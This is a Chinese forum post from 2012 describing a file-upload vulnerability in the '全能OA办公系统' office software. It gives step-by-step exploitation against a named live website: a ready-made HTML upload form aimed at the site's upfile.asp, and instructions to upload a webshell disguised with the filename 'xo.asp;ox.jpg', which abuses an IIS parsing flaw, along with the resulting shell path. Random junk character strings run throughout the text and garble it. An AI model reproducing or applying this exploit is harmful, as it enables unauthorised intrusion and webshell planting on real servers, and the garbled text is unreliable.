全能OA办公系统 上传漏洞
" a% k* C0 Z* q, s8 N1 F- _) J3 ?
( K* L& ]8 q4 H& G系统介绍:0 N4 e% d m( @, ^8 o" Z8 E
4 O7 r/ T9 i- \4 q全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。2 u1 d% l$ R' B8 m8 q( C& r9 I/ P
5 g2 ~) ^( A7 j; X+ n! D. H主要功能:
* K1 O/ A- e x" G公司通告 + ^9 c, A/ J% o( ]$ b4 q1 R0 \& j" t
工作计划
0 ~* F& p" H p* j0 l/ i! s% ?通讯助理
9 n4 w! G6 H. V2 F* F; w客户资源
: [' n! s: \9 s+ |6 r6 e" b& g- N我的公文
& `; O6 h! V9 }: O公文传阅 4 \) g* T& p4 m) i- v
公共资源
% ^ _8 _6 x* V$ I资源预约
4 c- {9 k+ T% k3 d, I9 u今日考勤
" e. |. R) Z6 u9 j( S/ U个人计划
' N' y' n7 |+ B% Y( T个人通讯录 7 ]' a1 |+ I. Z9 x
个人基本档案
: t/ @1 X9 Q( h/ n$ d- P! ]未读邮件
! J( G/ l# P, p. V) e6 J" Z发邮件 9 [# a+ _4 J3 {7 r4 \
收件夹
{2 b' V3 A' W+ k0 N7 ]4 ?+ Q寄件夹 % f) X# H" m9 d1 o$ S. V: k* O
网络硬盘
9 g8 \) E( s: z# M' g# A+ j7 M网络会议
5 z5 w. Y; n& |网络调查
$ v- U& w. j* o4 `; @2 e交流论坛* H8 r! v6 B5 J2 `
' F& S' |2 q0 f# c4 I
有兴趣测试的朋友可以下源码看看
5 Q; e% g ~$ ^1 X$ e1 M+ v. V1 C4 z+ _
源码下载:# k8 v( ?; O1 |+ k
/ u! J m. K% g1 F7 s/ z) ? Mhttp://www.mycodes.net/30/4750.htm
. p" T& l$ ~8 m0 W2 R. j- q. I9 x3 p u. z! M. I/ m- d( q' h4 k
漏洞介绍:! P2 r# ~2 y9 S! J
" `' i- Q+ d o
由upfile.asp上传文件漏洞引起
/ ~1 u# A4 U, G5 }( w
7 V1 K* P1 U3 H# l/ x测试方法:
2 V3 b0 v. q9 L2 z' C) M7 W1 j' e6 I* S6 m# _9 p4 J2 t$ j
使用名小子上传http://www.itlynn.com/upfile.asp即可
% n8 [6 @5 [' ?' W N/ Q/ z$ S$ n! h
G, D W+ z3 P4 @# T7 G" I如果upfile.asp文件被删除不存在。- a- B+ t" x4 w9 k7 ^- r' e+ I3 |% c
O. Y* B, g3 k 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
1 B- g; d! w. [6 U$ N& g( i7 K* B* ?/ v) O) T% f0 J* d* _, g
如果存在那么将如下代码保存为upfile.html。6 V: `1 C/ I# d
1 Y4 ]4 D: ?' s
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
7 h D6 q# g, O& K, U8 P
( ^+ G0 Q3 h8 B+ H
- [0 _, J4 i Z, O
# i# h: d+ b! u: y# u6 ]# l01 <table border='0' align="center" cellpadding="5">
- J( H" k1 |; ?* y% v$ S
% f0 P" o0 Q1 u% _02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
0 n, s3 m; R' O; ^0 q+ p% f
& e. g* s% U2 K2 r7 M03 <tr> 2 y$ r( A6 ^7 `5 H
2 T H: U6 A1 o8 }: M- R4 ]
04 <td>报错:</td>
* c% E, T7 _: S2 ]- Y! A# _' v. z% D2 ^( K& z4 ^( G
05 <td><input type='radio' name='errnumber' value='0'>
. H: F9 E0 F% C1 a2 k9 H0 V" t: z5 [; |+ K
06 自动更名 + }) L: o9 X; E+ v' d
. H) n9 R8 G/ D- D* {$ I; B% W07 <input type='radio' name='errnumber' value='1' checked> 6 T2 N# @) F, r! q0 `! s9 @( b& ^
0 L1 v7 S6 y" W
08 报错方式
n& w0 Z+ g3 w+ C* G8 d1 Y! R( s
1 R4 O1 u* a( B& l5 w0 f0 O& [1 w09 <input type='radio' name='errnumber' value='2'>
# i, ^& x; n4 c0 {+ x9 M5 p4 T, ]: j; X
10 直接覆盖</td> 6 g4 N' C3 X, j; s4 n3 v+ F
8 k3 u( M5 I9 R11 </tr>
! y B! I. w) |5 }. a0 K% J; H4 M* p, @& G/ d
12 <tr>
* ^! p ]! ^( ? Y8 z* _( ~$ R
" Z u4 ~. ?7 D# P13 <td>主题:</td>
( O4 s% |/ r r! ^
' R) w7 B% G3 r. j. Y; h' N2 H14 <td><input type='text' name='filename' size='30'></td> 8 ~: A$ D! o# c% G/ _& M
; K, n5 |" T+ o6 j, a15 </tr>
3 B- x, c" N6 Q
3 u+ \( G0 e3 J$ P* W+ v- j16 <tr>
5 y. g D" m1 N2 e4 b- ]% o" K4 X$ d. S0 C, ~, n, G0 P5 n8 C1 f
17 <td>文件:</td>
9 I i1 w# h! d! N+ A" l9 \4 n
! T" Z$ r. r0 M: }# d3 L18 <td><input type="file"name="fruit"size="30"></td> $ K' ~# M) S2 m$ l) N4 Z% G' C
, l1 e$ M9 V, d3 R# j) [9 g* J
19 </tr> 6 o7 X" W/ }- A6 |: Y9 ?
" c8 C$ o* e3 F8 b3 `$ L0 W
20 <tr>
. H4 R& F9 P: l3 P9 ^: V8 `* A: }% B3 B& r3 Y% P
21 <td valign='top'>简介:</td> * {! o7 {- `6 N$ Q
: ]1 f- ~, ] K$ j/ D# v
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
8 l+ p8 E0 G8 `$ [" g$ e7 y& E1 F& Z: M+ K
23 </tr>
; t( A& l# t3 g2 C$ q; O
8 B: x; }5 |/ h9 m' B5 j9 `- n/ H" I7 h24 % {' R0 M2 B0 Y( ]4 E! L) f
2 I* G/ I( L0 Y# v$ G( `- G
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
' g0 i" R5 |+ }6 [% M$ K( V7 q5 _
( V7 R8 V9 A0 y* V/ N" x$ ~26 </tr>
& S1 [: H; O5 S* G/ M
2 W6 C! `! p* J" \6 n" y+ A27 </form> : b- j2 G- v2 X7 v( r Q0 ]3 |# Q; l
/ c6 H3 L3 Z* T3 p
然后打开上传一个文件名为xo.asp;ox.jpg的文件。7 a* b, J8 D- @! A. o0 ?: f5 L
$ [) G$ u1 x9 h7 K- p \1 w8 u
# q/ @0 m) T; U, `6 b1 }* A/ V
- M5 {% Y, L8 D上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg9 l) f; Y! p, T! m- @! d
, c D# }9 g1 I f2 C此漏洞需要配合解析漏洞利用。$ c" b# r1 \& m* N
2 T9 U/ f4 x& f |
发表于 2012-11-21 13:45:12
收藏
支持
反对